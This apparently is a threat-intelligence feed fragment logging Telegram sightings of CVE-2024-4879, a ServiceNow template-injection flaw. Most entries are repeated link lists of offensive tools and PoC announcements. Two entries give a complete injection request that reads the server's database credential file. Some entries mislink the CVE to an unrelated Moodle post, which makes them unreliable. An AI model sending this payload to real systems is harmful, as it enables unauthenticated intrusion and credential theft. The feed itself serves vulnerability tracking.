\"Title\": \"CVE-2024-4879 - ServiceNow has addressed an input validation vulne\", \n  \"Content\": \"CVE ID : CVE-2024-4879 \nPublished : July 10, 2024, 5:15 p.m. | 24\u00a0minutes ago \nDescription : ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington, D.C. Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform.\u00a0ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"10 Jul 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-07-10T19:43:19.000000Z"}, {"uuid": "e2be8612-a92b-4af9-9073-d99e8a617edd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1261", "content": "cve-2024-4879\n\nGET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E%22 HTTP/1.1\n\n#exploit #poc", "creation_timestamp": "2024-07-14T17:12:40.000000Z"}, {"uuid": "8eea3171-fe94-44cb-8b7d-402b0f255560", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "Telegram/JU2HtEmjxUFTRKPmldrvMx4629VaP96haSuDCPtpTmyrxI8", "content": "", "creation_timestamp": "2024-08-28T17:39:47.000000Z"}, {"uuid": "e91da6bc-47fc-4089-9277-4c7aac1f2072", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/562", "content": "Tools - Hackers Factory \n\nHellPot is an endless honeypot based on Heffalump that sends unruly HTTP bots to hell.\n\nhttps://github.com/yunginnanet/HellPot\n\nWork-in-progress date-time SQLite extension that will support timezones.\n\nhttps://github.com/asg017/sqlite-jiff\n\nSubdominator is a powerful tool for passive subdomain enumeration during bug hunting and reconnaissance processes. It is designed to help researchers and cybersecurity professionals discover potential security vulnerabilities by efficiently enumerating subdomains some various free passive resources.\n\nhttps://github.com/RevoltSecurities/Subdominator\n\nCVE-2024-4879 Exploit & PoC - Nuclei Template\n\nhttps://github.com/Brut-Security/CVE-2024-4879\n\nCVE-2024-34102: Unauthenticated Magento XXE.\n\nCVEHunter tool for vulnerability detection and exploitation tool for CVE-2024-34102 with Asychronous Performance.\n\nhttps://github.com/th3gokul/CVE-2024-34102\n\nCVE-2024-5009 : WhatsUp Gold SetAdminPassword Privilege Escalation.\n\nCVEHunter tool for vulnerability detection and exploitation tool for CVE-2024-5009 with Asychronous Performance.\n\nhttps://github.com/th3gokul/CVE-2024-5009\n\nSubprober - An essential HTTP multi-purpose Probing Tool for Penetration Testers and Security Researchers with Asynchronous httpx client support.\n\nhttps://github.com/RevoltSecurities/SubProber\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-01T03:33:14.000000Z"}, {"uuid": "821b3802-e896-4b79-b4a5-db79c78e16d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "seen", "source": "https://t.me/lostsec/781", "content": "CVE-2024-4879 | Jelly Template Injection Vulnerability in ServiceNow\n\nmass hunting soon..and sorry guys i uploaded many videos in yt  but i am waiting for bbp program to resolve that issue first bcz of there policy so just wait few days or weeks depend how fast they resolve..and also busy in some other things soon active..", "creation_timestamp": "2024-07-13T16:02:48.000000Z"}, {"uuid": "49ffb482-04f7-4b35-8c7a-eac5b82b9d60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/425", "content": "Tools - Hackers Factory \n\nBloodHoundAD/BARK: BloodHound Attack Research Kit''\n\nhttps://github.com/BloodHoundAD/BARK\n\nCreate yourself #exp of CVE-2024-4367: PDF.js\n\nhttps://github.com/rzte/pdf-exploit\n\nCVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow\n\nhttps://github.com/Brut-Security/CVE-2024-4879\n\n''GitHub - erebe/wstunnel: Tunnel all your traffic over Websocket or HTTP2 - Bypass firewalls/DPI - Static binary available''\n\nhttps://github.com/erebe/wstunnel\n\nOctoberfest7/MemFiles: A CobaltStrike toolkit to write files produced by Beacon to memory instead of disk''\n\nhttps://github.com/Octoberfest7/MemFiles\n\nelastic/SWAT: Simple Workspace Attack Tool (SWAT) is a tool for simulating malicious behavior against Google Workspace in reference to the MITRE ATT&CK framework.''\n\nhttps://github.com/elastic/SWAT\n\npmatula/Windows-Internals-Learning-Resources\n\nhttps://github.com/pmatula/Windows-Internals-Learning-Resources\n\nIntegration-IT/Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.''\n\nhttps://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet\n\n0xEr3bus/RdpStrike: Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP.''\n\nhttps://github.com/0xEr3bus/RdpStrike\n\nwh0amitz/SharpADWS: Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS).''\n\nhttps://github.com/wh0amitz/SharpADWS\n\nsrlabs/Certiception: An ADCS honeypot to catch attackers in your internal network.''\n\nhttps://github.com/srlabs/Certiception\n\nmertdas/SharpIncrease: A Tool that aims to evade av with binary padding''\n\nhttps://github.com/mertdas/SharpIncrease\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-18T08:55:28.000000Z"}, {"uuid": "dd08a3fe-5db5-43e6-ab72-f13b20b85c79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/390", "content": "PoC RELEASED: CVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow\n\nGitHub: https://github.com/Brut-Security/CVE-2024-4879", "creation_timestamp": "2024-07-13T08:11:16.000000Z"}, {"uuid": "90eeb274-dfd1-41a0-b5b3-69e83bc9e93b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3409", "content": "PoC RELEASED: CVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow\n\nGitHub: https://github.com/Brut-Security/CVE-2024-4879", "creation_timestamp": "2024-07-14T11:15:13.000000Z"}, {"uuid": "f058406c-e35e-4641-bdad-b263a7904af9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8444", "content": "Tools - Hackers Factory \n\nHellPot is an endless honeypot based on Heffalump that sends unruly HTTP bots to hell.\n\nhttps://github.com/yunginnanet/HellPot\n\nWork-in-progress date-time SQLite extension that will support timezones.\n\nhttps://github.com/asg017/sqlite-jiff\n\nSubdominator is a powerful tool for passive subdomain enumeration during bug hunting and reconnaissance processes. It is designed to help researchers and cybersecurity professionals discover potential security vulnerabilities by efficiently enumerating subdomains some various free passive resources.\n\nhttps://github.com/RevoltSecurities/Subdominator\n\nCVE-2024-4879 Exploit & PoC - Nuclei Template\n\nhttps://github.com/Brut-Security/CVE-2024-4879\n\nCVE-2024-34102: Unauthenticated Magento XXE.\n\nCVEHunter tool for vulnerability detection and exploitation tool for CVE-2024-34102 with Asychronous Performance.\n\nhttps://github.com/th3gokul/CVE-2024-34102\n\nCVE-2024-5009 : WhatsUp Gold SetAdminPassword Privilege Escalation.\n\nCVEHunter tool for vulnerability detection and exploitation tool for CVE-2024-5009 with Asychronous Performance.\n\nhttps://github.com/th3gokul/CVE-2024-5009\n\nSubprober - An essential HTTP multi-purpose Probing Tool for Penetration Testers and Security Researchers with Asynchronous httpx client support.\n\nhttps://github.com/RevoltSecurities/SubProber\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-01T03:55:12.000000Z"}, {"uuid": "789831e0-d449-4433-b654-91df6fe8b19f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8264", "content": "Tools - Hackers Factory \n\nBloodHoundAD/BARK: BloodHound Attack Research Kit''\n\nhttps://github.com/BloodHoundAD/BARK\n\nCreate yourself #exp of CVE-2024-4367: PDF.js\n\nhttps://github.com/rzte/pdf-exploit\n\nCVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow\n\nhttps://github.com/Brut-Security/CVE-2024-4879\n\n''GitHub - erebe/wstunnel: Tunnel all your traffic over Websocket or HTTP2 - Bypass firewalls/DPI - Static binary available''\n\nhttps://github.com/erebe/wstunnel\n\nOctoberfest7/MemFiles: A CobaltStrike toolkit to write files produced by Beacon to memory instead of disk''\n\nhttps://github.com/Octoberfest7/MemFiles\n\nelastic/SWAT: Simple Workspace Attack Tool (SWAT) is a tool for simulating malicious behavior against Google Workspace in reference to the MITRE ATT&CK framework.''\n\nhttps://github.com/elastic/SWAT\n\npmatula/Windows-Internals-Learning-Resources\n\nhttps://github.com/pmatula/Windows-Internals-Learning-Resources\n\nIntegration-IT/Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.''\n\nhttps://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet\n\n0xEr3bus/RdpStrike: Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP.''\n\nhttps://github.com/0xEr3bus/RdpStrike\n\nwh0amitz/SharpADWS: Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS).''\n\nhttps://github.com/wh0amitz/SharpADWS\n\nsrlabs/Certiception: An ADCS honeypot to catch attackers in your internal network.''\n\nhttps://github.com/srlabs/Certiception\n\nmertdas/SharpIncrease: A Tool that aims to evade av with binary padding''\n\nhttps://github.com/mertdas/SharpIncrease\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-18T08:56:28.000000Z"}, {"uuid": "8b5b82d2-d8f1-433a-9101-f90837688286", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3581", "content": "Tools - Hackers Factory \n\nHellPot is an endless honeypot based on Heffalump that sends unruly HTTP bots to hell.\n\nhttps://github.com/yunginnanet/HellPot\n\nWork-in-progress date-time SQLite extension that will support timezones.\n\nhttps://github.com/asg017/sqlite-jiff\n\nSubdominator is a powerful tool for passive subdomain enumeration during bug hunting and reconnaissance processes. It is designed to help researchers and cybersecurity professionals discover potential security vulnerabilities by efficiently enumerating subdomains some various free passive resources.\n\nhttps://github.com/RevoltSecurities/Subdominator\n\nCVE-2024-4879 Exploit & PoC - Nuclei Template\n\nhttps://github.com/Brut-Security/CVE-2024-4879\n\nCVE-2024-34102: Unauthenticated Magento XXE.\n\nCVEHunter tool for vulnerability detection and exploitation tool for CVE-2024-34102 with Asychronous Performance.\n\nhttps://github.com/th3gokul/CVE-2024-34102\n\nCVE-2024-5009 : WhatsUp Gold SetAdminPassword Privilege Escalation.\n\nCVEHunter tool for vulnerability detection and exploitation tool for CVE-2024-5009 with Asychronous Performance.\n\nhttps://github.com/th3gokul/CVE-2024-5009\n\nSubprober - An essential HTTP multi-purpose Probing Tool for Penetration Testers and Security Researchers with Asynchronous httpx client support.\n\nhttps://github.com/RevoltSecurities/SubProber\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-01T03:33:21.000000Z"}, {"uuid": "1691c9d0-a3d6-405e-9cb0-dc5ca1220c3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3440", "content": "Tools - Hackers Factory \n\nBloodHoundAD/BARK: BloodHound Attack Research Kit''\n\nhttps://github.com/BloodHoundAD/BARK\n\nCreate yourself #exp of CVE-2024-4367: PDF.js\n\nhttps://github.com/rzte/pdf-exploit\n\nCVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow\n\nhttps://github.com/Brut-Security/CVE-2024-4879\n\n''GitHub - erebe/wstunnel: Tunnel all your traffic over Websocket or HTTP2 - Bypass firewalls/DPI - Static binary available''\n\nhttps://github.com/erebe/wstunnel\n\nOctoberfest7/MemFiles: A CobaltStrike toolkit to write files produced by Beacon to memory instead of disk''\n\nhttps://github.com/Octoberfest7/MemFiles\n\nelastic/SWAT: Simple Workspace Attack Tool (SWAT) is a tool for simulating malicious behavior against Google Workspace in reference to the MITRE ATT&CK framework.''\n\nhttps://github.com/elastic/SWAT\n\npmatula/Windows-Internals-Learning-Resources\n\nhttps://github.com/pmatula/Windows-Internals-Learning-Resources\n\nIntegration-IT/Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.''\n\nhttps://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet\n\n0xEr3bus/RdpStrike: Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP.''\n\nhttps://github.com/0xEr3bus/RdpStrike\n\nwh0amitz/SharpADWS: Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS).''\n\nhttps://github.com/wh0amitz/SharpADWS\n\nsrlabs/Certiception: An ADCS honeypot to catch attackers in your internal network.''\n\nhttps://github.com/srlabs/Certiception\n\nmertdas/SharpIncrease: A Tool that aims to evade av with binary padding''\n\nhttps://github.com/mertdas/SharpIncrease\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-18T08:56:31.000000Z"}, {"uuid": "0cc8823c-d979-41a7-ac62-4a35830d5f57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/6965", "content": "Tools - Hackers Factory \n\nBloodHoundAD/BARK: BloodHound Attack Research Kit''\n\nhttps://github.com/BloodHoundAD/BARK\n\nCreate yourself #exp of CVE-2024-4367: PDF.js\n\nhttps://github.com/rzte/pdf-exploit\n\nCVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow\n\nhttps://github.com/Brut-Security/CVE-2024-4879\n\n''GitHub - erebe/wstunnel: Tunnel all your traffic over Websocket or HTTP2 - Bypass firewalls/DPI - Static binary available''\n\nhttps://github.com/erebe/wstunnel\n\nOctoberfest7/MemFiles: A CobaltStrike toolkit to write files produced by Beacon to memory instead of disk''\n\nhttps://github.com/Octoberfest7/MemFiles\n\nelastic/SWAT: Simple Workspace Attack Tool (SWAT) is a tool for simulating malicious behavior against Google Workspace in reference to the MITRE ATT&CK framework.''\n\nhttps://github.com/elastic/SWAT\n\npmatula/Windows-Internals-Learning-Resources\n\nhttps://github.com/pmatula/Windows-Internals-Learning-Resources\n\nIntegration-IT/Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.''\n\nhttps://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet\n\n0xEr3bus/RdpStrike: Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP.''\n\nhttps://github.com/0xEr3bus/RdpStrike\n\nwh0amitz/SharpADWS: Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS).''\n\nhttps://github.com/wh0amitz/SharpADWS\n\nsrlabs/Certiception: An ADCS honeypot to catch attackers in your internal network.''\n\nhttps://github.com/srlabs/Certiception\n\nmertdas/SharpIncrease: A Tool that aims to evade av with binary padding''\n\nhttps://github.com/mertdas/SharpIncrease\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-18T08:56:28.000000Z"}, {"uuid": "23f6bc87-7283-4168-8c7c-b818c505f8bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/GhostClanInt/25308", "content": "Tools - Hackers Factory \n\nBloodHoundAD/BARK: BloodHound Attack Research Kit''\n\nhttps://github.com/BloodHoundAD/BARK\n\nCreate yourself #exp of CVE-2024-4367: PDF.js\n\nhttps://github.com/rzte/pdf-exploit\n\nCVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow\n\nhttps://github.com/Brut-Security/CVE-2024-4879\n\n''GitHub - erebe/wstunnel: Tunnel all your traffic over Websocket or HTTP2 - Bypass firewalls/DPI - Static binary available''\n\nhttps://github.com/erebe/wstunnel\n\nOctoberfest7/MemFiles: A CobaltStrike toolkit to write files produced by Beacon to memory instead of disk''\n\nhttps://github.com/Octoberfest7/MemFiles\n\nelastic/SWAT: Simple Workspace Attack Tool (SWAT) is a tool for simulating malicious behavior against Google Workspace in reference to the MITRE ATT&CK framework.''\n\nhttps://github.com/elastic/SWAT\n\npmatula/Windows-Internals-Learning-Resources\n\nhttps://github.com/pmatula/Windows-Internals-Learning-Resources\n\nIntegration-IT/Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.''\n\nhttps://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet\n\n0xEr3bus/RdpStrike: Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP.''\n\nhttps://github.com/0xEr3bus/RdpStrike\n\nwh0amitz/SharpADWS: Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS).''\n\nhttps://github.com/wh0amitz/SharpADWS\n\nsrlabs/Certiception: An ADCS honeypot to catch attackers in your internal network.''\n\nhttps://github.com/srlabs/Certiception\n\nmertdas/SharpIncrease: A Tool that aims to evade av with binary padding''\n\nhttps://github.com/mertdas/SharpIncrease\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-18T16:16:32.000000Z"}, {"uuid": "de5eb981-fc7d-4129-8cd1-980a93883cd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "seen", "source": "https://t.me/breachdetector/580664", "content": "{\n  \"Source\": \"https://leakbase.cc/\",\n  \"Content\": \"Cve-2024-4879 & Cve-2024-5217 Servicenow Rce Scanning\", \n  \"author\": \" (dealerseek)\",\n  \"Detection Date\": \"28 Jul 2024\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 t.me/breachdetector \ud83d\udd39", "creation_timestamp": "2024-07-28T09:36:45.000000Z"}, {"uuid": "a4fb51ab-750f-4c6a-bd05-a957718a8f45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7132", "content": "Tools - Hackers Factory \n\nHellPot is an endless honeypot based on Heffalump that sends unruly HTTP bots to hell.\n\nhttps://github.com/yunginnanet/HellPot\n\nWork-in-progress date-time SQLite extension that will support timezones.\n\nhttps://github.com/asg017/sqlite-jiff\n\nSubdominator is a powerful tool for passive subdomain enumeration during bug hunting and reconnaissance processes. It is designed to help researchers and cybersecurity professionals discover potential security vulnerabilities by efficiently enumerating subdomains some various free passive resources.\n\nhttps://github.com/RevoltSecurities/Subdominator\n\nCVE-2024-4879 Exploit & PoC - Nuclei Template\n\nhttps://github.com/Brut-Security/CVE-2024-4879\n\nCVE-2024-34102: Unauthenticated Magento XXE.\n\nCVEHunter tool for vulnerability detection and exploitation tool for CVE-2024-34102 with Asychronous Performance.\n\nhttps://github.com/th3gokul/CVE-2024-34102\n\nCVE-2024-5009 : WhatsUp Gold SetAdminPassword Privilege Escalation.\n\nCVEHunter tool for vulnerability detection and exploitation tool for CVE-2024-5009 with Asychronous Performance.\n\nhttps://github.com/th3gokul/CVE-2024-5009\n\nSubprober - An essential HTTP multi-purpose Probing Tool for Penetration Testers and Security Researchers with Asynchronous httpx client support.\n\nhttps://github.com/RevoltSecurities/SubProber\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-01T03:55:12.000000Z"}, {"uuid": "71501675-a0fa-4f1a-9382-802055264922", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3082", "content": "https://github.com/fa-rrel/CVE-2024-4879\n\nJelly Template Injection Vulnerability in ServiceNow | POC CVE-2024-4879\n\nFOFA : \"server : servicenow\"\n#github #exploit", "creation_timestamp": "2024-08-28T17:08:30.000000Z"}, {"uuid": "4bbf26c9-5351-4891-8394-c0d5700cf8aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/GhostClanInt/25272", "content": "PoC RELEASED: CVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow\n\nGitHub: https://github.com/Brut-Security/CVE-2024-4879", "creation_timestamp": "2024-07-14T12:01:37.000000Z"}, {"uuid": "aa86c0bd-d24e-4590-8343-bb83eaf91134", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/11054", "content": "#exploit\n1. CVE-2024-4879:\nJelly Template Injection Vulnerability in ServiceNow\nhttps://blog.redteam-pentesting.de/2024/moodle-rce\n\n2. CVE-2024-5932:\nWordPress GiveWP Donation/Fundraising Platform 3.14.1 Code Execution\nhttps://packetstormsecurity.com/files/180463/WordPress-GiveWP-Donation-Fundraising-Platform-3.14.1-Code-Execution.html", "creation_timestamp": "2024-08-30T16:51:16.000000Z"}, {"uuid": "29e7eae7-dbb7-4f59-992f-75d3a361053f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2784", "content": "cve-2024-4879\n\nGET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E%22 HTTP/1.1\n\n#exploit #poc", "creation_timestamp": "2024-07-14T18:00:42.000000Z"}, {"uuid": "53174b67-8807-4edd-ae99-b839d4dd1e19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/4261", "content": "#exploit\n1. CVE-2024-4879:\nJelly Template Injection Vulnerability in ServiceNow\nhttps://blog.redteam-pentesting.de/2024/moodle-rce\n\n2. CVE-2024-5932:\nWordPress GiveWP Donation/Fundraising Platform 3.14.1 Code Execution\nhttps://packetstormsecurity.com/files/180463/WordPress-GiveWP-Donation-Fundraising-Platform-3.14.1-Code-Execution.html", "creation_timestamp": "2024-08-30T20:36:47.000000Z"}, {"uuid": "b464cec5-5b8b-4786-aff4-5ba4acf74efb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/4257", "content": "#exploit\n1. CVE-2024-4879:\nJelly Template Injection Vulnerability in ServiceNow\nhttps://blog.redteam-pentesting.de/2024/moodle-rce\n\n2. CVE-2024-5932:\nWordPress GiveWP Donation/Fundraising Platform 3.14.1 Code Execution\nhttps://packetstormsecurity.com/files/180463/WordPress-GiveWP-Donation-Fundraising-Platform-3.14.1-Code-Execution.html", "creation_timestamp": "2024-08-30T06:50:06.000000Z"}]}